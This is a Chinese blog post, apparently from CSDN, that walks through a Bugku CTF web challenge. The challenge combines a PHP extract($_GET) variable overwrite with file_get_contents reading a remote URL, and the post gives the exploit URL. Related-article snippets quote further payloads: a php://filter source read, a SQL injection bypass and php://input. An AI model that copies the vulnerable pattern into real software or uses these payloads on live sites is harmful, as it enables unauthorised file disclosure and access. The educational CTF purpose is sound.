bugku 新平台 web1 writeup

最新推荐文章于 2022-05-10 11:52:16 发布
最新推荐文章于 2022-05-10 11:52:16 发布
阅读量1.6k 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sx234com/article/details/89172647
版权

题目:

看题型主要出题思路是变量覆盖+RFI(远程文件包含)

知识点链接:

变量覆盖:https://www.cnblogs.com/xiaozi/p/7768580.html

远程文件包含:https://blog.csdn.net/sx234com/article/details/88994605

 

解题过程代码分析;自己按照上面的代码写出来验证一下是最好的解题思路。

<?php
header("Content-type:text/html;charset=utf-8");
include 'flag.php';

//echo var_dump($_GET);

$b='ssAEDsssss';

extract($_GET); //见到extract函数 考虑变量覆盖

if(isset($a)){
    $c=trim(file_get_contents($b));

//A 此处 读取$b的值 因为使用了file_get_contents函数则有可能出现RFI远程文件包含漏洞 
//B 构造一个远程文件info.txt 放置在我自己的服务器上面 info.txt中内容为 1  远程访问链接为http://自己的域名/info.txt
//C 而$b变量上面已经赋值 见到extract函数 考虑变量覆盖 
//D 故 url在构造的时候就可以进行赋值覆盖上面$b='ssAEDsssss'; 的值 利用上面B得到的url 让file_get_contents读取远程info.txt内容1 覆盖变量$b 则$b的值为1
//E 构造URL 如下:http://123.206.31.85:10001/?a=1&b=http://你的域名/readme.txt&c=1 使传入值全部为1 触发成功


    echo 'b='.$b.'<br/>';
    echo 'a='.$a.'<br/>';
    echo 'c='.$c.'<br/>';
    
    if($a==$c){
        echo "ok flag is xxx";
    }else{
        echo '不行没得到!';
    }
}

得到的运行结果如下:

sx234com
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku杂项题writeup
11-22
bugku杂项题writeup
BUGKU代码审计之extract变量覆盖
weixin_43803070的博客
06-07 507
话不多说直接上代码: <?php $flag='xxx'; extract($_GET); //变量覆盖 if(isset($shiyan)) //shiyan这个变量一定要存在,说白了不能的等于0. { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{...
引入flag.php文件,flag在php中咋解决
weixin_33982355的博客
03-10 2543
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
bugku ctf 代码审计 extract变量覆盖
qq_42777804的博客
05-21 2598
<?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> extract() 函数从数组中将变量导入到当...
风云杯大学生信安大赛(Web部分题解)
saltor
05-15 1万+
PS:菜鸟一枚,只做出了7题,第8,9题见过类似的但还是不会。。。还是坐等大神们的wp吧。WEB01http://139.129.166.67/4t56ysgh6h7u/ 答案格式:仅输入{ }花括号中的内容 分值 50 本题考查的是正则表达式页面源码:<?php highlight_file('2.php'); $key='KEY{*****************************
BugKuCTF——PHP代码审计-extract变量覆盖
kuller_Yan的博客
10-21 346
BugKuCTF——代码审计–extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 漏洞:extract()函数在传入数值的时候把已有的的值替换掉,所以直接goujianpayload: ?sh
[2021东华杯]Web Writeup1
08-03
Java 反序列化漏洞及利用 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,发生在 Java 对象的序列化和反序列化过程中。该漏洞可以导致攻击者执行恶意代码,盗取敏感信息,或者控制服务器。 ...
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
web渗透writeup
09-11
因此,我们可以利用`UNION SELECT`来构造一条的SQL查询,将我们想要的MD5加密后的密码注入到查询结果中,例如:`' and 0=1 union select '529CA8050A00180790CF88B63468826A'#`,这样就绕过了原本的验证,成功获取...
网络安全管理职业技能竞赛Web writeup1
08-03
网络安全管理职业技能竞赛Web writeup1 在本次网络安全管理职业技能竞赛Web writeup中,我们将探讨Web安全领域中的一个CTF挑战,涵盖了SQL注入、错误信息处理、Web应用安全等多个方面的知识点。 SQL注入 在本挑战...
bugku学习之34.web8 - 考察php的extra、trim、file_get_contents函数
s11show_163的博客
02-29 540
考察php的extra、trim、file_get_contents函数 方法一: 先根据 题目提示 txt??? 访问 flag.txt,发现其中内容 flags $ac是指flag.txt中的内容flags,$fn指的是flag.txt这个文件 Payload: ?ac=flags&fn=flag.txt 方法二: 想得到flag,要达到下面三个条件: 就要让ac的值不为空 f...
web8--php函数extract()、file_get_contents()、trim()
qq_32642035的博客
03-09 1558
看题 extract() 函数从数组中将变量导入到当前的符号表。此函数会将数组键名当作变量名,值作为变量的值。 trim()去除字符串首尾处的空白字符 file_get_contents()将整个文件读入一个字符串 要求:ac的值与fn的文件内容相等 file_get_contents()读取一个文件内容到字符串,可以利用php://input绕过,使ac的值与fn输入一致 构造payload ...
CTF BugKu平台———(Web篇②)
Aluxian_的博客
05-10 974
源代码: unescape编码:https://tool.chinaz.com/Tools/Escape.aspx PS:p1+’%35%34%61%61%32’ + p2 然后提交即可 67d709b2b54aa2aa648cf6e87a7114f1 文件包含: file=php://filter/read=convert.base64-encode/resource=index.php #构造pyload 好像需要密码: bp爆破密码:12468 备份是个好习惯: ...
Bugku web1
ChanCherry的博客
09-28 933
web2 一打开网页,好多表情朝你涌来,不管那么多,F12查看一下,就会看到flag。 计算器 F12查看一下源码 web基础$_GET url传入?what=flag web基础$_POST
2021-06-15
ZZZllllllxx的博客
06-19 1011
2021/6/15 bugku web30 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> 这题也有关php伪协议看到了file_get_contents这
php get请求_ctf中关于php伪协议的考查
weixin_39928003的博客
11-30 502
原创:Archerx 合天智汇1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinclude('flag.php');$a= $_GET["a"];if(isset($a)&&(file_get_contents($a,'r'))=== 'this is tes...
CTF中文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 5万+
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
ctf中怎样获取php文件源码,ctf中关于php伪协议的考查
weixin_33483567的博客
03-09 1383
原创: Archerx ...
BugkuCTF–flag在index里
超人学飞的日子
06-05 4万+
题目地址http://120.24.86.145:8005/post/这道题目里有经典的本地文件包含漏洞+php伪协议的结合应用点击后注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php这是一个典型的文件包含漏洞,(file关键字是提示,其实也是CTF的套路)。这里用到了php的封装协议:http://php.net/ma...
解密Bugku CTFMisc挑战:社工与二维码解析
"bugku ctf misc wp.pdf 是一个关于CTF比赛解题的writeup,主要涉及了社工和编码解密方面的知识。" 在CTF(Capture The Flag)竞赛中,"Misc"通常指的是各种混合类题目,涵盖广泛的知识领域,包括但不限于密码学、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值